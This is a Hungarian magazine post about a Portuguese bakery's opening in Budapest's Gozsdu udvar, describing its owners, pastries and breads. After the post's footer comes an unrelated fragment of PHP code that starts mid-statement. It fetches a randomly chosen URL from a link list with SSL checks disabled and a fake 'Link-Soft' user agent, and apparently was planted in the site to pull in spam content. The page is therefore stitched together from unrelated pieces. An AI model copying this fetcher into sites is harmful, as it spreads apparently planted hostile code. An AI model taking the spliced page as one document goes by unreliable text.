Lisszabonból, szeretettel

Porcukorfelhő, vaníliakrémes kosárkák, sózott tőkehallal töltött krokettek. A mesés és még annál is édesebb Portugália megérkezett Budapest szívébe. Rattner Réka a Lisboa Pastry&Bakery megnyitóján járt. A multikulti Gozsdu udvarban már eddig is bőven volt választék a nemzetek konyháiból, február elején pedig új náció finomságaival bővült a választék: portugál ízek és vendégszeretet várja a mediterrán életérzés... View Article


Porcukorfelhő, vaníliakrémes kosárkák, sózott tőkehallal töltött krokettek. A mesés és még annál is édesebb Portugália megérkezett Budapest szívébe. Rattner Réka a Lisboa Pastry&Bakery megnyitóján járt.

A multikulti Gozsdu udvarban már eddig is bőven volt választék a nemzetek konyháiból, február elején pedig új náció finomságaival bővült a választék: portugál ízek és vendégszeretet várja a mediterrán életérzés és a pastel de nata szerelmeseit. A pezsgő udvar egyik csendesebb sarkában talált otthonra a kávézó és pékség, amely fő terméke az ellenállhatatlan vaníliapudingos kosárka (pastel de nata), de emellett egyszerűbb sütemények és a nemzetközi – főleg a francia – cukrászművészet remekeit is megtalálhatjuk a kínálatban.

Az egyik tulajdonos, Joao Marques elmesélte, hogy a kávézó ötlete akkor jutott az eszébe, amikor egy elragadó üdülővárosból, Cascaisból tartott hazafelé, és meglátta az előtte haladó kisteherautó oldalán díszelgő pékség márkajelzését. Arra a kérdésre pedig, hogy a pékséget miért Budapesten hozta létre, elmondta, hogy Magyarországon, de még a fővárosban sincs autentikus portugál vendéglátóhely. Ezt az űrt szerette volna kitölteni, ezáltal is népszerűsítve a portugál (gasztro)kultúrát, amiben a budapesti portugál nagykövetség is örömmel segédkezik.

A szakmai vezetés a szintén tulajdonostárs Daniel Sousa pék feladata, aki a kenyereket hagyományos eljárással, vagyis kovásszal és hosszú kelesztéssel készíti. Találunk a kínálatban gyökérkenyeret, de a közönségkedvenc várhatóan a nagymamakenyér lesz nedves belsejével és ropogós, rusztikus külsejével. A különlegességekre fogékony látogatóknak sem kell majd üres kézzel távozniuk, a magvas-spenótos kenyér és a sáfránnyal, füstölt sonkával és parmezánnal ízesített veknik sokaknál azonnali elcsábuláshoz vezethetnek.

A pékség eredetiségét mi sem bizonyítja jobban, mint az ott dolgozó hat portugál munkatárs, köztük a mindig mosolygó Rita, akivel minden vendég úgy érezheti magát, mintha ő lenne az egyetlen az üzletben. Joao tervei közé tartozik, hogy további kávézókat nyisson városszerte, aminek bizonyosan sok városlakó örülne.

(Visited 1 times, 1 visits today)

The post Lisszabonból, szeretettel appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>